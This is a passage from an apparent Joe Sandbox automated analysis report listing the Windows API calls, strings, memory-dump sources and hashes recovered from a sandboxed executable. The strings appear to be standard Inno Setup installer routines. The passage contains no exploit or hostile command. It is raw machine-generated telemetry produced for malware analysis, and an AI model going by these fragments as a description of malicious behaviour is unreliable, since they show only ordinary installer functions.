                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                  • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                  • String ID: l>Y
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,00459DAE,?,00000000,00000000,00000000,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 00459CF2
                                                                    • Part of subcall function 004543C8: FindClose.KERNEL32(000000FF,004544BE), ref: 004544AD
                                                                  Strings
                                                                  • Failed to strip read-only attribute., xrefs: 00459CC0
                                                                  • Deleting directory: %s, xrefs: 00459C7B
                                                                  • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459CCC
                                                                  • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459D67
                                                                  • Failed to delete directory (%d)., xrefs: 00459D88
                                                                  • Stripped read-only attribute., xrefs: 00459CB4
                                                                  • Failed to delete directory (%d). Will retry later., xrefs: 00459D0B
                                                                  Similarity
                                                                  • API ID: CloseErrorFindLast
                                                                  • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                  APIs
                                                                  • GetCapture.USER32 ref: 00422E9C
                                                                  • GetCapture.USER32 ref: 00422EAB
                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB1
                                                                  • ReleaseCapture.USER32 ref: 00422EB6
                                                                  • GetActiveWindow.USER32 ref: 00422EC5
                                                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F44
                                                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FA8
                                                                  • GetActiveWindow.USER32 ref: 00422FB7
                                                                  Similarity
                                                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                  • String ID:
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0042F2B2
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0042F2C9
                                                                  • GetActiveWindow.USER32 ref: 0042F2D2
                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F2FF
                                                                  • SetActiveWindow.USER32(?,0042F42F,00000000,?), ref: 0042F320
                                                                  Similarity
                                                                  • API ID: Window$ActiveLong$Message
                                                                  • String ID:
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000), ref: 00429482
                                                                  • GetTextMetricsA.GDI32(00000000), ref: 0042948B
                                                                    • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0042949A
                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 004294A7
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004294AE
                                                                  • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294B6
                                                                  • GetSystemMetrics.USER32(00000006), ref: 004294DB
                                                                  • GetSystemMetrics.USER32(00000006), ref: 004294F5
                                                                  Similarity
                                                                  • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                  • String ID:
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,?,00419051,004980EA), ref: 0041DE1F
                                                                  • 73A24620.GDI32(00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE29
                                                                  • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE36
                                                                  • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE45
                                                                  • GetStockObject.GDI32(00000007), ref: 0041DE53
                                                                  • GetStockObject.GDI32(00000005), ref: 0041DE5F
                                                                  • GetStockObject.GDI32(0000000D), ref: 0041DE6B
                                                                  • LoadIconA.USER32(00000000,00007F00), ref: 0041DE7C
                                                                  Similarity
                                                                  • API ID: ObjectStock$A24620A480A570IconLoad
                                                                  • String ID:
                                                                  APIs
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0046316C
                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463201), ref: 00463172
                                                                  • SetCursor.USER32(?,004631E9,00007F02,00000000,00463201), ref: 004631DC
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Cursor$Load
                                                                  • String ID: $ $Internal error: Item already expanding
                                                                  APIs
                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                  APIs
                                                                  • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 0047673D
                                                                  • 73A259E0.USER32(00000000,000000FC,00476698,00000000,0047697C,?,00000000,004769A6), ref: 00476764
                                                                  • GetACP.KERNEL32(00000000,0047697C,?,00000000,004769A6), ref: 004767A1
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004767E7
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: A259ClassInfoMessageSend
                                                                  • String ID: COMBOBOX$Inno Setup: Language
                                                                  APIs
                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00408958,?,?,?,?,00000000,00000000,00000000,?,0040995F,00000000,00409972), ref: 0040872A
                                                                    • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                    • Part of subcall function 004085A4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087A6,?,?,?,00000000,00408958), ref: 004085B7
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: InfoLocale$DefaultSystem
                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 1044490935-665933166
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00000000,004118F1), ref: 00411784
                                                                  • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411842
                                                                    • Part of subcall function 00411AA4: CreatePopupMenu.USER32 ref: 00411ABE
                                                                  • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118CE
                                                                    • Part of subcall function 00411AA4: CreateMenu.USER32 ref: 00411AC8
                                                                  • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                  • String ID: ,$?
                                                                  • API String ID: 2359071979-2308483597
                                                                  APIs
                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF20
                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF2F
                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF80
                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF8E
                                                                  • DeleteObject.GDI32(?), ref: 0041BF97
                                                                  • DeleteObject.GDI32(?), ref: 0041BFA0
                                                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFBD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                  • String ID:
                                                                  • API String ID: 1030595962-0
                                                                  APIs
                                                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEF6
                                                                  • 73A24620.GDI32(00000000,00000026), ref: 0041CF15
                                                                  • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF7B
                                                                  • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF8A
                                                                  • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFF4
                                                                  • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D032
                                                                  • 73A18830.GDI32(?,?,00000001,0041D064,00000000,00000026), ref: 0041D057
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Stretch$A18830$A122A24620BitsMode
                                                                  • String ID:
                                                                  • API String ID: 430401518-0
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,?,?), ref: 0045714E
                                                                    • Part of subcall function 00424274: GetWindowTextA.USER32(?,?,00000100), ref: 00424294
                                                                    • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                    • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                    • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571B5
                                                                  • TranslateMessage.USER32(?), ref: 004571D3
                                                                  • DispatchMessageA.USER32(?), ref: 004571DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                  • String ID: [Paused]
                                                                  • API String ID: 3047529653-4230553315
                                                                  APIs
                                                                  • GetCursor.USER32(00000000,0046B37F), ref: 0046B2FC
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0046B30A
                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B310
                                                                  • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B31A
                                                                  • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B320
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$LoadSleep
                                                                  • String ID: CheckPassword
                                                                  • API String ID: 4023313301-1302249611
                                                                  APIs
                                                                    • Part of subcall function 00477628: GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                                    • Part of subcall function 00477628: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                                    • Part of subcall function 00477628: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                                  • SendMessageA.USER32(00000000,0000004A,00000000,00477ABA), ref: 00477735
                                                                  • GetTickCount.KERNEL32 ref: 0047777A
                                                                  • GetTickCount.KERNEL32 ref: 00477784
                                                                  • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004777D9
                                                                  Strings
                                                                  • CallSpawnServer: Unexpected response: $%x, xrefs: 0047776A
                                                                  • CallSpawnServer: Unexpected status: %d, xrefs: 004777C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                  • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                  • API String ID: 613034392-3771334282
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045965F
                                                                  Strings
                                                                  • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045966A
                                                                  • CreateAssemblyCache, xrefs: 00459656
                                                                  • Fusion.dll, xrefs: 004595FF
                                                                  • Failed to load .NET Framework DLL "%s", xrefs: 00459644
                                                                  • .NET Framework CreateAssemblyCache function failed, xrefs: 00459682
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                  • API String ID: 190572456-3990135632
                                                                  APIs
                                                                    • Part of subcall function 0041C040: GetObjectA.GDI32(?,00000018), ref: 0041C04D
                                                                  • GetFocus.USER32 ref: 0041C160
                                                                  • 73A1A570.USER32(?), ref: 0041C16C
                                                                  • 73A18830.GDI32(?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C18D
                                                                  • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C199
                                                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B0
                                                                  • 73A18830.GDI32(?,00000000,00000000,0041C1F2,?,?), ref: 0041C1D8
                                                                  • 73A1A480.USER32(?,?,0041C1F2,?,?), ref: 0041C1E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A18830$A122A480A570BitsFocusObject
                                                                  • String ID:
                                                                  • API String ID: 2231653193-0
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000000E), ref: 00418C68
                                                                  • GetSystemMetrics.USER32(0000000D), ref: 00418C70
                                                                  • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C76
                                                                    • Part of subcall function 004099A8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CA4,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099AC
                                                                  • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CC6
                                                                  • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD1
                                                                  • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000), ref: 00418CE4
                                                                  • 6F530860.COMCTL32(0049B628,00418D07,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E), ref: 00418CFA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$C400C740F530860F532980
                                                                  • String ID:
                                                                  • API String ID: 209721339-0
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004832E0), ref: 004832C5
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                  • API String ID: 47109696-2530820420
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,?,?,00000000), ref: 00494A25
                                                                    • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00494A47
                                                                  • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00494FC5), ref: 00494A5B
                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 00494A7D
                                                                  • 73A1A480.USER32(00000000,00000000,00494AA7,00494AA0,?,00000000,?,?,00000000), ref: 00494A9A
                                                                  Strings
                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494A52
                                                                  Similarity
                                                                  • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                  • API String ID: 1435929781-222967699
                                                                  APIs
                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                                  • DeleteDC.GDI32(?), ref: 0041B4D1
                                                                  Similarity
                                                                  • API ID: ObjectSelect$Delete$Stretch
                                                                  • String ID:
                                                                  • API String ID: 1458357782-0
                                                                  APIs
                                                                  • GetCursorPos.USER32 ref: 004233A7
                                                                  • WindowFromPoint.USER32(?,?), ref: 004233B4
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233C2
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004233C9
                                                                  • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233E2
                                                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004233F9
                                                                  • SetCursor.USER32(00000000), ref: 0042340B
                                                                  Similarity
                                                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                  • String ID:
                                                                  • API String ID: 1770779139-0
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494848
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494855
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494862
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                  • API String ID: 667068680-2254406584
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D4B1
                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D4C1
                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D4D1
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                  • API String ID: 190572456-212574377
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004808CA), ref: 0042EA2D
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA33
                                                                  • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA44
                                                                    • Part of subcall function 0042E9A4: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                                    • Part of subcall function 0042E9A4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                                    • Part of subcall function 0042E9A4: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                                  • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA58
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                  • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                  • API String ID: 142928637-2676053874
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F081), ref: 0044C7E3
                                                                  • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7F4
                                                                  • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C804
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                  • API String ID: 2238633743-1050967733
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                                  • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                                  • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                  • API String ID: 667068680-222143506
                                                                  APIs
                                                                  • GetFocus.USER32 ref: 0041B73D
                                                                  • 73A1A570.USER32(?), ref: 0041B749
                                                                  • 73A18830.GDI32(00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B77E
                                                                  • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B78A
                                                                  • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7B8
                                                                  • 73A18830.GDI32(00000000,00000000,00000000,0041B7F9,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7EC
                                                                  Similarity
                                                                  • API ID: A18830$A122A26310A570Focus
                                                                  • String ID:
                                                                  • API String ID: 3906783838-0
                                                                  • Opcode ID: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                                  • Instruction ID: 1a6b37f464f6ee1ac690d44aa7d10d16b676852f44f67843991ec4a9ec0a7b01
                                                                  • Opcode Fuzzy Hash: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                                  • Instruction Fuzzy Hash: D9512070A002099FCF11DFA9C891AEEBBF8EF49704F10446AF514A7790D7799981CBA9
                                                                  APIs
                                                                  • GetFocus.USER32 ref: 0041BA0F
                                                                  • 73A1A570.USER32(?), ref: 0041BA1B
                                                                  • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA55
                                                                  • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA61
                                                                  • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BA85
                                                                  • 73A18830.GDI32(00000000,00000000,00000000,0041BAC6,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BAB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
